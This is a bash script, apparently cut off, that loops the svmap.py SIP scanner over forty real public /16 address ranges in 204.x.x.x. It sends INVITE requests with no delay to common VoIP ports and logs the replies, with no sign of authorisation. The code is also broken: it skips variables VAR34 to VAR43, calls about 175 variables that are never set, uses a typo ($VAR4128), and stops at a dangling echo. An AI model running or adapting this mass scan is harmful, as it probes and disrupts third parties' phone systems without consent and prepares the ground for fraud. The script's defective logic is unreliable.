#!/bin/bash

# Scan IPv4 range on port sip

echo -e "\nStart scanning ...\n"

VAR1=204.0.0.0/16
VAR2=204.1.0.0/16
VAR3=204.2.0.0/16
VAR4=204.3.0.0/16
VAR5=204.4.0.0/16
VAR6=204.5.0.0/16
VAR7=204.6.0.0/16
VAR8=204.7.0.0/16
VAR9=204.8.0.0/16
VAR10=204.9.0.0/16
VAR11=204.10.0.0/16
VAR12=204.11.0.0/16
VAR13=204.12.0.0/16
VAR14=204.13.0.0/16
VAR15=204.14.0.0/16
VAR16=204.15.0.0/16
VAR17=204.16.0.0/16
VAR18=204.17.0.0/16
VAR19=204.18.0.0/16
VAR20=204.19.0.0/16
VAR21=204.20.0.0/16
VAR22=204.21.0.0/16
VAR23=204.22.0.0/16
VAR24=204.23.0.0/16
VAR25=204.24.0.0/16
VAR26=204.25.0.0/16
VAR27=204.26.0.0/16
VAR28=204.27.0.0/16
VAR29=204.28.0.0/16
VAR30=204.29.0.0/16
VAR31=204.30.0.0/16
VAR32=204.31.0.0/16
VAR33=204.32.0.0/16
VAR44=204.33.0.0/16
VAR45=204.34.0.0/16
VAR46=204.35.0.0/16
VAR47=204.36.0.0/16
VAR48=204.37.0.0/16
VAR49=204.38.0.0/16
VAR50=204.39.0.0/16

         echo ----------------- $VAR1----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR1 -m INVITE -v >> result.txt

         echo ----------------- $VAR2----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR2 -m INVITE -v >> result.txt

         echo ----------------- $VAR3----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR3 -m INVITE -v >> result.txt

         echo ----------------- $VAR4----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR4 -m INVITE -v >> result.txt

         echo ----------------- $VAR5----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR5 -m INVITE -v >> result.txt

         echo ----------------- $VAR6----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR6 -m INVITE -v >> result.txt

         echo ----------------- $VAR7----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR7 -m INVITE -v >> result.txt

         echo ----------------- $VAR8----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR8 -m INVITE -v >> result.txt

         echo ----------------- $VAR9----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR9 -m INVITE -v >> result.txt

         echo ----------------- $VAR10----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR10 -m INVITE -v >> result.txt

         echo ----------------- $VAR11----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR11 -m INVITE -v >> result.txt

         echo ----------------- $VAR12----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR12 -m INVITE -v >> result.txt

         echo ----------------- $VAR13----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR13 -m INVITE -v >> result.txt

         echo ----------------- $VAR14----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR14 -m INVITE -v >> result.txt

         echo ----------------- $VAR15----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR15 -m INVITE -v >> result.txt

         echo ----------------- $VAR16----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR16 -m INVITE -v >> result.txt

         echo ----------------- $VAR17----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR17 -m INVITE -v >> result.txt

         echo ----------------- $VAR18----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR18 -m INVITE -v >> result.txt

         echo ----------------- $VAR19----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR19 -m INVITE -v >> result.txt

         echo ----------------- $VAR20----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR20 -m INVITE -v >> result.txt

         echo ----------------- $VAR21----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR21 -m INVITE -v >> result.txt

         echo ----------------- $VAR22----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR22 -m INVITE -v >> result.txt

         echo ----------------- $VAR23----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR23 -m INVITE -v >> result.txt

         echo ----------------- $VAR24----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR24 -m INVITE -v >> result.txt

         echo ----------------- $VAR25----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR25 -m INVITE -v >> result.txt

         echo ----------------- $VAR26----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR26 -m INVITE -v >> result.txt

         echo ----------------- $VAR27----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR27 -m INVITE -v >> result.txt

         echo ----------------- $VAR28----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR28 -m INVITE -v >> result.txt

         echo ----------------- $VAR29----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR29 -m INVITE -v >> result.txt

         echo ----------------- $VAR30----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR30 -m INVITE -v >> result.txt

         echo ----------------- $VAR31----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR31 -m INVITE -v >> result.txt

         echo ----------------- $VAR32----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR32 -m INVITE -v >> result.txt

         echo ----------------- $VAR33----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR33 -m INVITE -v >> result.txt

         echo ----------------- $VAR34----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR34 -m INVITE -v >> result.txt

         echo ----------------- $VAR35----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR35 -m INVITE -v >> result.txt

         echo ----------------- $VAR36----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR36 -m INVITE -v >> result.txt

         echo ----------------- $VAR37----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR37 -m INVITE -v >> result.txt

         echo ----------------- $VAR38----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR38 -m INVITE -v >> result.txt

         echo ----------------- $VAR39----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR39 -m INVITE -v >> result.txt

         echo ----------------- $VAR40----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR40 -m INVITE -v >> result.txt

         echo ----------------- $VAR41----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR41 -m INVITE -v >> result.txt

         echo ----------------- $VAR42----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR42 -m INVITE -v >> result.txt

         echo ----------------- $VAR43----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR43 -m INVITE -v >> result.txt

         echo ----------------- $VAR44----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR44 -m INVITE -v >> result.txt

         echo ----------------- $VAR45----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR45 -m INVITE -v >> result.txt

         echo ----------------- $VAR46----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR46 -m INVITE -v >> result.txt

         echo ----------------- $VAR47----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR47 -m INVITE -v >> result.txt

         echo ----------------- $VAR48----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR48 -m INVITE -v >> result.txt

         echo ----------------- $VAR49----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR49 -m INVITE -v >> result.txt

         echo ----------------- $VAR50----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR50 -m INVITE -v >> result.txt

         echo ----------------- $VAR51----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR51 -m INVITE -v >> result.txt

         echo ----------------- $VAR52----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR52 -m INVITE -v >> result.txt

         echo ----------------- $VAR53----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR53 -m INVITE -v >> result.txt

         echo ----------------- $VAR54----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR54 -m INVITE -v >> result.txt

         echo ----------------- $VAR55----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR55 -m INVITE -v >> result.txt

         echo ----------------- $VAR56----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR56 -m INVITE -v >> result.txt

         echo ----------------- $VAR57----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR57 -m INVITE -v >> result.txt

         echo ----------------- $VAR58----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR58 -m INVITE -v >> result.txt

         echo ----------------- $VAR59----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR59 -m INVITE -v >> result.txt

         echo ----------------- $VAR60----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR60 -m INVITE -v >> result.txt

         echo ----------------- $VAR61----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR61 -m INVITE -v >> result.txt

         echo ----------------- $VAR62----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR62 -m INVITE -v >> result.txt

         echo ----------------- $VAR63----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR63 -m INVITE -v >> result.txt

         echo ----------------- $VAR64----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR64 -m INVITE -v >> result.txt

         echo ----------------- $VAR65----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR65 -m INVITE -v >> result.txt

         echo ----------------- $VAR66----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR66 -m INVITE -v >> result.txt

         echo ----------------- $VAR67----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR67 -m INVITE -v >> result.txt

         echo ----------------- $VAR68----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR68 -m INVITE -v >> result.txt

         echo ----------------- $VAR69----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR69 -m INVITE -v >> result.txt

         echo ----------------- $VAR70----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR70 -m INVITE -v >> result.txt

         echo ----------------- $VAR71----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR71 -m INVITE -v >> result.txt

         echo ----------------- $VAR72----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR72 -m INVITE -v >> result.txt

         echo ----------------- $VAR73----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR73 -m INVITE -v >> result.txt

         echo ----------------- $VAR74----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR74 -m INVITE -v >> result.txt

         echo ----------------- $VAR75----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR75 -m INVITE -v >> result.txt

         echo ----------------- $VAR76----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR76 -m INVITE -v >> result.txt

         echo ----------------- $VAR77----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR77 -m INVITE -v >> result.txt

         echo ----------------- $VAR78----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR78 -m INVITE -v >> result.txt

         echo ----------------- $VAR79----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR79 -m INVITE -v >> result.txt

         echo ----------------- $VAR80----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR80 -m INVITE -v >> result.txt

         echo ----------------- $VAR81----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR81 -m INVITE -v >> result.txt

         echo ----------------- $VAR82----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR82 -m INVITE -v >> result.txt

         echo ----------------- $VAR83----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR83 -m INVITE -v >> result.txt

         echo ----------------- $VAR84----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR84 -m INVITE -v >> result.txt

         echo ----------------- $VAR85----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR85 -m INVITE -v >> result.txt

         echo ----------------- $VAR86----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR86 -m INVITE -v >> result.txt

         echo ----------------- $VAR87----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR87 -m INVITE -v >> result.txt

         echo ----------------- $VAR88----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR88 -m INVITE -v >> result.txt

         echo ----------------- $VAR89----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR89 -m INVITE -v >> result.txt

         echo ----------------- $VAR90----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR90 -m INVITE -v >> result.txt

         echo ----------------- $VAR91----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR91 -m INVITE -v >> result.txt

         echo ----------------- $VAR92----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR92 -m INVITE -v >> result.txt

         echo ----------------- $VAR93----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR93 -m INVITE -v >> result.txt

         echo ----------------- $VAR94----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR94 -m INVITE -v >> result.txt

         echo ----------------- $VAR95----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR95 -m INVITE -v >> result.txt

         echo ----------------- $VAR96----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR96 -m INVITE -v >> result.txt

         echo ----------------- $VAR97----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR97 -m INVITE -v >> result.txt

         echo ----------------- $VAR98----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR98 -m INVITE -v >> result.txt

         echo ----------------- $VAR99----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR99 -m INVITE -v >> result.txt

         echo ----------------- $VAR100----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR100 -m INVITE -v >> result.txt

         echo ----------------- $VAR101----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR101 -m INVITE -v >> result.txt

         echo ----------------- $VAR102----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR102 -m INVITE -v >> result.txt

         echo ----------------- $VAR103----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR103 -m INVITE -v >> result.txt

         echo ----------------- $VAR104----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR104 -m INVITE -v >> result.txt

         echo ----------------- $VAR105----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR105 -m INVITE -v >> result.txt

         echo ----------------- $VAR106----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR106 -m INVITE -v >> result.txt

         echo ----------------- $VAR107----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR107 -m INVITE -v >> result.txt

         echo ----------------- $VAR108----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR108 -m INVITE -v >> result.txt

         echo ----------------- $VAR109----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR109 -m INVITE -v >> result.txt

         echo ----------------- $VAR110----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR110 -m INVITE -v >> result.txt

         echo ----------------- $VAR111----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR111 -m INVITE -v >> result.txt

         echo ----------------- $VAR112----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR112 -m INVITE -v >> result.txt

         echo ----------------- $VAR113----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR113 -m INVITE -v >> result.txt

         echo ----------------- $VAR114----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR114 -m INVITE -v >> result.txt

         echo ----------------- $VAR115----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR115 -m INVITE -v >> result.txt

         echo ----------------- $VAR116----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR116 -m INVITE -v >> result.txt

         echo ----------------- $VAR117----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR117 -m INVITE -v >> result.txt

         echo ----------------- $VAR118----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR118 -m INVITE -v >> result.txt

         echo ----------------- $VAR119----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR119 -m INVITE -v >> result.txt

         echo ----------------- $VAR120----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR120 -m INVITE -v >> result.txt

         echo ----------------- $VAR121----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR121 -m INVITE -v >> result.txt

         echo ----------------- $VAR122----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR122 -m INVITE -v >> result.txt

         echo ----------------- $VAR123----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR123 -m INVITE -v >> result.txt

         echo ----------------- $VAR124----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR124 -m INVITE -v >> result.txt

         echo ----------------- $VAR125----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR125 -m INVITE -v >> result.txt

         echo ----------------- $VAR126----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR126 -m INVITE -v >> result.txt

         echo ----------------- $VAR127----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR127 -m INVITE -v >> result.txt

         echo ----------------- $VAR128----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR4128 -m INVITE -v >> result.txt

         echo ----------------- $VAR129----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR129 -m INVITE -v >> result.txt

         echo ----------------- $VAR130----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR130 -m INVITE -v >> result.txt

         echo ----------------- $VAR131----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR131 -m INVITE -v >> result.txt

         echo ----------------- $VAR132----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR132 -m INVITE -v >> result.txt

         echo ----------------- $VAR133----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR133 -m INVITE -v >> result.txt

         echo ----------------- $VAR134----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR134 -m INVITE -v >> result.txt

         echo ----------------- $VAR135----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR135 -m INVITE -v >> result.txt

         echo ----------------- $VAR136----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR136 -m INVITE -v >> result.txt

         echo ----------------- $VAR137----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR137 -m INVITE -v >> result.txt

         echo ----------------- $VAR138----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR138 -m INVITE -v >> result.txt

         echo ----------------- $VAR139----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR139 -m INVITE -v >> result.txt

         echo ----------------- $VAR140----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR140 -m INVITE -v >> result.txt

         echo ----------------- $VAR141----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR141 -m INVITE -v >> result.txt

         echo ----------------- $VAR142----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR142 -m INVITE -v >> result.txt

         echo ----------------- $VAR143----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR143 -m INVITE -v >> result.txt

         echo ----------------- $VAR144----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR144 -m INVITE -v >> result.txt

         echo ----------------- $VAR145----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR145 -m INVITE -v >> result.txt

         echo ----------------- $VAR146----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR146 -m INVITE -v >> result.txt

         echo ----------------- $VAR147----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR147 -m INVITE -v >> result.txt

         echo ----------------- $VAR148----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR148 -m INVITE -v >> result.txt

         echo ----------------- $VAR149----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR149 -m INVITE -v >> result.txt

         echo ----------------- $VAR150----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR150 -m INVITE -v >> result.txt

         echo ----------------- $VAR151----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR151 -m INVITE -v >> result.txt

         echo ----------------- $VAR152----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR152 -m INVITE -v >> result.txt

         echo ----------------- $VAR153----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR153 -m INVITE -v >> result.txt

         echo ----------------- $VAR154----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR154 -m INVITE -v >> result.txt

         echo ----------------- $VAR155----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR155 -m INVITE -v >> result.txt

         echo ----------------- $VAR156----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR156 -m INVITE -v >> result.txt

         echo ----------------- $VAR157----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR157 -m INVITE -v >> result.txt

         echo ----------------- $VAR158----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR158 -m INVITE -v >> result.txt

         echo ----------------- $VAR159----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR159 -m INVITE -v >> result.txt

         echo ----------------- $VAR160----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR160 -m INVITE -v >> result.txt

         echo ----------------- $VAR161----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR161 -m INVITE -v >> result.txt

         echo ----------------- $VAR162----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR162 -m INVITE -v >> result.txt

         echo ----------------- $VAR163----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR163 -m INVITE -v >> result.txt

         echo ----------------- $VAR164----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR164 -m INVITE -v >> result.txt

         echo ----------------- $VAR165----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR165 -m INVITE -v >> result.txt

         echo ----------------- $VAR166----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR166 -m INVITE -v >> result.txt

         echo ----------------- $VAR167----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR167 -m INVITE -v >> result.txt

         echo ----------------- $VAR168----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR168 -m INVITE -v >> result.txt

         echo ----------------- $VAR169----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR169 -m INVITE -v >> result.txt

         echo ----------------- $VAR170----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR170 -m INVITE -v >> result.txt

         echo ----------------- $VAR171----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR171 -m INVITE -v >> result.txt

         echo ----------------- $VAR172----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR172 -m INVITE -v >> result.txt

         echo ----------------- $VAR173----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR173 -m INVITE -v >> result.txt

         echo ----------------- $VAR174----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR174 -m INVITE -v >> result.txt

         echo ----------------- $VAR175----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR175 -m INVITE -v >> result.txt

         echo ----------------- $VAR176----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR176 -m INVITE -v >> result.txt

         echo ----------------- $VAR177----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR177 -m INVITE -v >> result.txt

         echo ----------------- $VAR178----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR178 -m INVITE -v >> result.txt

         echo ----------------- $VAR179----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR179 -m INVITE -v >> result.txt

         echo ----------------- $VAR180----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR180 -m INVITE -v >> result.txt

         echo ----------------- $VAR181----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR181 -m INVITE -v >> result.txt

         echo ----------------- $VAR182----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR182 -m INVITE -v >> result.txt

         echo ----------------- $VAR183----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR183 -m INVITE -v >> result.txt

         echo ----------------- $VAR184----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR184 -m INVITE -v >> result.txt

         echo ----------------- $VAR185----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR185 -m INVITE -v >> result.txt

         echo ----------------- $VAR186----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR186 -m INVITE -v >> result.txt

         echo ----------------- $VAR187----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR187 -m INVITE -v >> result.txt

         echo ----------------- $VAR188----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR188 -m INVITE -v >> result.txt

         echo ----------------- $VAR189----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR189 -m INVITE -v >> result.txt

         echo ----------------- $VAR190----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR190 -m INVITE -v >> result.txt

         echo ----------------- $VAR191----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR191 -m INVITE -v >> result.txt

         echo ----------------- $VAR192----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR192 -m INVITE -v >> result.txt

         echo ----------------- $VAR193----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR193 -m INVITE -v >> result.txt

         echo ----------------- $VAR194----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR194 -m INVITE -v >> result.txt

         echo ----------------- $VAR195----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR195 -m INVITE -v >> result.txt

         echo ----------------- $VAR196----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR196 -m INVITE -v >> result.txt

         echo ----------------- $VAR197----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR197 -m INVITE -v >> result.txt

         echo ----------------- $VAR198----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR198 -m INVITE -v >> result.txt

         echo ----------------- $VAR199----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR199 -m INVITE -v >> result.txt

         echo ----------------- $VAR200----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR200 -m INVITE -v >> result.txt

         echo ----------------- $VAR201----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR201 -m INVITE -v >> result.txt

         echo ----------------- $VAR202----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR202 -m INVITE -v >> result.txt

         echo ----------------- $VAR203----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR203 -m INVITE -v >> result.txt

         echo ----------------- $VAR204----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR204 -m INVITE -v >> result.txt

         echo ----------------- $VAR205----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR205 -m INVITE -v >> result.txt

         echo ----------------- $VAR206----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR206 -m INVITE -v >> result.txt

         echo ----------------- $VAR207----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR207 -m INVITE -v >> result.txt

         echo ----------------- $VAR208----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR208 -m INVITE -v >> result.txt

         echo ----------------- $VAR209----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR209 -m INVITE -v >> result.txt

         echo ----------------- $VAR210----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR210 -m INVITE -v >> result.txt

         echo ----------------- $VAR211----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR211 -m INVITE -v >> result.txt

         echo ----------------- $VAR212----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR212 -m INVITE -v >> result.txt

         echo ----------------- $VAR213----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR213 -m INVITE -v >> result.txt

         echo ----------------- $VAR214----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR214 -m INVITE -v >> result.txt

         echo ----------------- $VAR215----------------
